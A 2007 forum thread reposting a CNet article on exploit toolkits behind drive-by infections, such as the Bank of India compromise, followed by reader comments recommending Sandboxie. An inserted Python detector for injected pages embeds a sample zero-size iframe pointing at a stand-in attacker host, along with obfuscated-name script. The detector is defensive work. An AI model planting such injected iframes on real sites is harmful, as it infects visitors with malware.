Free Republic
News/Activism

The rise of crimeware
CNet News ^ | 07 September 2007 | Robert Vamosi

Posted on 09/11/2007 8:20:11 AM PDT by ShadowAce

For a few hours late last week, visitors to the Bank of India Web site had their browsers covertly redirected to a site hosting malicious exploits. Increasingly, criminals, often without any technical experience, are defacing popular Web sites with code that allows them to direct your browser to download content without you even knowing. Finjan, a security company that's been on the cutting edge of detecting Web 2.0 malware, identifies 10 toolkits for sale on the Internet, up from earlier this year. If you are an online criminal these days, says Yuval Ben-Itzhak, CTO of Finjan, "you are buying a software package from hackers. Without any computer science skill or any security background, you can install this package on any Web server and start to infect people with malicious code." As long as the thieves are making money, there appears to be no sign of stopping this current rise in crimeware.

The Bank of India
A few weeks ago, I wrote about the process: criminals inject JavaScript onto a live Web page; if the site is vulnerable to script injection attacks, the code (often an iFrame) gets added to the Web site. The site's administrators have no idea that their visitors are becoming infected with whatever code the criminals want to install--Trojans usually, sometimes bots. That's what happened to the Bank of India Web site. To see a real-time video capture of what happened to the Bank of India site, watch this video.

Roger Thompson, whose company, Exploit Prevention Labs, makes LinkScanner prevention software, offers his account of what happened. Thompson says there were multiple exploits used in the Bank of India attack. "One was a simple MS06-042, which was essentially cut and pasted from the original Milw0rm proof of concept. The second exploit set was an as-yet-unidentified exploit package, along the lines of MPack / IcePack / WebAttacker. The real difference, however, is that it had machine-generated variable and function names. In other words, the server-side script was generating the scripts in order to try to defeat scanners."

Who's responsible?
Who's responsible for creating these malicious code toolkits? Finjan's Ben-Itzhak says, "we see different groups creating them. We realize that the MPack group and the WebAttacker group are two different groups. We also believe the IcePack and Neosploit and MultiExploit toolkits are different groups, each using a different set of exploits." In July 2007, SecurityFocus editor Robert Lemos spoke with one of the members of Dream Coders Team, the party believed to be responsible for MPack. "We are just a group of people working together but doing some illegal business," he said. He also denied any contact with real-world Russian criminals.

The hacker said the Dream Coders Team (DCT) consists of three people, plus a few freelancers. The developers are all Russian, while the others are from various countries. DCT said that all the recent publicity has drawn the attention of law enforcement. "In Russia, there is a law which forbids (malicious software) creation tools like MPack, (but) we secure our systems to the best possible extent, so that even a police officer would not be able to get the PCs analyzed," said DCT. Despite these precautions, he said that "we will have to shut down the project soon."

More not less
That doesn't appear to be happening. If anything, MPack still tops Finjan's list of the most popular toolkits available today, followed by WebAttacker and WebAttacker II, IcePack, NeoSploit and MultiExploit. "However," Ben-Itzhak says, "we see additional ones that are less known, less popular, but they are out there. They're using different techniques from the big ones and we name them in our report."

Exploit Prevention Labs' Thompson agrees, saying one of the Bank of India attacks "contained a VML exploit, probably MS07-004, another MS06-042, a WinZip, a QuickTime, and a SetSlice. This would be very similar to MPack / Icepack except that it is missing an ANI (MS07-017), and it contains instead the VML." For the most part, these are exploits for flaws that Microsoft has already patched. The assumption is that the user hasn't yet patched their system, which, sadly, is often the case with non-Microsoft software.

Few zero days included with these kits
Fortunately, zero-day exploits, attacks on previously unannounced software flaws, are rare within these crimeware toolkits, says Ben-Itzhak. "Usually we'll find zero-day attacks on third-party applications rather than Microsoft operating systems. So, you'll often find zero-day attacks relating to WinZip and Adobe Flash Player, because people usually are not updating them." That's because older versions did not include automatic updates; if you didn't know to update, you remain vulnerable.

He says "Flash and WinZip are the most popular ones--but we see some others such as CD content burners, some editing tools--but these are less popular applications. With Flash and WinZip you'll see them on almost any desktop around the world today. So that's the reason the hackers are interested in these exploits."

What can be done?
Both Finjan and Exploit Prevention Labs offer free safe-surfing tools. I like Finjan SecureBrowsing and LinkScanner because they actively scan the pages loading into your Internet browser. That way, if someone has injected malicious code onto, say, a trusted page, these products will alert you.

McAfee SiteAdvisor continues to disappoint me. It uses a white-list database, so if the site has already been checked and declared clean, you'll see that trusted green symbol even if the site was compromised just five minutes ago. Given that so much on the Internet changes within an instant, I fail to see how SiteAdvisor can promise to protect against these kinds of attacks. On the other hand, SiteAdvisor is effective against phishing sites, something that Finjan and Exploit Prevention Labs don't do well.


TOPICS: Business/Economy; Technical
KEYWORDS: crimeware; malware; spyware

1 posted on 09/11/2007 8:20:13 AM PDT by ShadowAce
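The article describes two markers of this kind of compromise: a hidden iframe injected into a legitimate page, and server-side generated scripts whose variable and function names are randomized to defeat signature scanners. The following is an added illustration (not code from the article, Finjan or Exploit Prevention Labs) of the "scan the page as it loads" approach the author prefers over a whitelist: it parses a constructed sample page and flags hidden iframes and scripts whose declared identifiers look machine-generated. The sample HTML, the placeholder host `attacker.example` and the entropy thresholds are all assumptions.

```python
import math
import re
from html.parser import HTMLParser

# Constructed sample page: a benign script, then the two injected markers
# the article describes (zero-size iframe, randomized identifiers).
SAMPLE_HTML = """<html><body>
<script>
function showMenu() { var pageTitle = document.title; }
</script>
<p>Welcome to our bank.</p>
<iframe src="http://attacker.example/in.cgi?3" width="0" height="0"></iframe>
<script>
var hJ7qkzR2wx = document.location;
function xQ9vLmT4pb() { return hJ7qkzR2wx; }
</script>
</body></html>"""

HIDDEN = re.compile(r"(width|height)=0\b|display\s*:\s*none|visibility\s*:\s*hidden", re.I)
IDENT = re.compile(r"\b(?:var|function)\s+([A-Za-z_$][\w$]*)")

class _Collector(HTMLParser):
    """Collects iframe attributes and inline script bodies from a page."""
    def __init__(self):
        super().__init__()
        self.iframes, self.scripts, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def iframe_is_hidden(attrs):
    blob = " ".join(f"{k}={v}" for k, v in attrs.items() if v is not None)
    return bool(HIDDEN.search(blob))

def looks_generated(name):
    # Heuristic (assumption): random names have high character entropy and
    # few vowels or many digits; real names are usually pronounceable words.
    if len(name) < 8:
        return False
    n = len(name)
    entropy = -sum(c / n * math.log2(c / n) for c in {ch: name.count(ch) for ch in set(name)}.values())
    vowels = sum(ch in "aeiouAEIOU" for ch in name) / n
    digits = sum(ch.isdigit() for ch in name) / n
    return entropy > 3.0 and (vowels < 0.25 or digits > 0.3)

def scan(html):
    """Return (finding, detail) pairs for hidden iframes and generated-looking scripts."""
    p = _Collector()
    p.feed(html)
    findings = [("hidden-iframe", a.get("src", "")) for a in p.iframes if iframe_is_hidden(a)]
    for body in p.scripts:
        names = IDENT.findall(body)
        odd = [m for m in names if looks_generated(m)]
        if names and len(odd) / len(names) >= 0.5:
            findings.append(("generated-identifiers", ",".join(odd)))
    return findings
```

Heuristics like these produce false positives on legitimately minified pages, which is why the products the author mentions combine them with exploit signatures rather than relying on any one test.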

To: rdb3; chance33_98; Calvinist_Dark_Lord; PenguinWry; GodGunsandGuts; CyberCowboy777; Salo; Bobsat; ..

2 posted on 09/11/2007 8:20:35 AM PDT by ShadowAce (Linux -- The Ultimate Windows Service Pack)

To: ShadowAce
You'd need a combination of tools to deter and defeat crimeware.

"Show me just what Mohammed brought that was new, and there you will find things only evil and inhuman, such as his command to spread by the sword the faith he preached." - Manuel II Palaeologus

3 posted on 09/11/2007 8:23:19 AM PDT by goldstategop (In Memory Of A Dearly Beloved Friend Who Lives In My Heart Forever)

To: goldstategop; ShadowAce
You'd need a combination of tools to deter and defeat crimeware.

This is one of the "New Toys" I've been using ... always browse with it now ... check it out I think you will like ...

Sandboxie

Sandboxie intercepts changes to both your files and registry settings, making it virtually impossible for any software to reach outside the sandbox.

Sandboxie traps cached browser items into the sandbox as a by-product of normal operation, so when you throw away the sandbox, all the history records and other side-effects of your browsing disappear as well.

everything is trapped in the sandbox -- malware/spyware/trojans/bots etc ... when you are done with a session just delete the sandbox ...

best of all Free and easy to use ...

4 posted on 09/11/2007 8:45:14 AM PDT by SubGeniusX ($29.95 Guarantees Your Salvation!!! Or TRIPLE Your Money Back!!!)

To: SubGeniusX

Sandboxie definitely looks like a good solution for Windows users. While it wouldn’t be of any use to me, I heartily recommend Windows users to protect themselves. If this stuff gets blocked effectively enough, then (hopefully) the attempts will also decline, and that is good for all of us.


5 posted on 09/11/2007 8:52:45 AM PDT by ShadowAce (Linux -- The Ultimate Windows Service Pack)

To: ShadowAce

Great article, ShadowAce, thanks.

I liked his debug utilities, what are they, do you know?


6 posted on 09/11/2007 9:18:59 AM PDT by papasmurf (I'm for Free, Fair, and Open trade. America needs to stand by its true Friend. Israel.)

To: ShadowAce

I agree...

I run both Windows and Linux...

but unfortunately I have a bit of a poker habit as well as some online gaming that is still windows only ... (WINE don't cut it sometimes) ...

but Sandboxie is fantastic, for windows users...


7 posted on 09/11/2007 9:38:13 AM PDT by SubGeniusX ($29.95 Guarantees Your Salvation!!! Or TRIPLE Your Money Back!!!)

To: SubGeniusX

“best of all Free and easy to use ...”

On download dotcom it is listed as a 30 day trial not free, is that correct?


8 posted on 09/11/2007 9:47:26 AM PDT by ansel12 (Romney longed to serve in Vietnam, ask me for the quote.)

To: ansel12
From The Sandboxie Registration page

"You may use Sandboxie free of charge for any length of time that you desire. However, if you use Sandboxie for more than 30 days, the software will occasionally remind you to consider paying the registration fee. By doing that, you would show your support for further development and improvement of Sandboxie.

By paying the registration fee of $25 US-dollars you get a life-time registration key to this and all upcoming versions of the Sandboxie product. You also get to use a few of the features of Sandboxie that are reserved for paying users.

Please bear in mind that this is currently a privately-operated endeavor, and registering Sandboxie does not guarantee you any level of technical support. You may, of course, always post your experiences with Sandboxie on the web forums or by e-mail, and I will do my very best to provide satisfactory answers and solutions to problems."

The "reminders" are quite infrequent... once upon launch every week or so, and do not interfere w/ operation at all ...

9 posted on 09/11/2007 9:59:18 AM PDT by SubGeniusX ($29.95 Guarantees Your Salvation!!! Or TRIPLE Your Money Back!!!)

To: SubGeniusX

Thanks, I’ll download it.


10 posted on 09/11/2007 10:09:06 AM PDT by ansel12 (Romney longed to serve in Vietnam, ask me for the quote.)

To: SubGeniusX

Thanks for the info....bumping for later reference


11 posted on 09/11/2007 10:12:39 AM PDT by VirginiaMom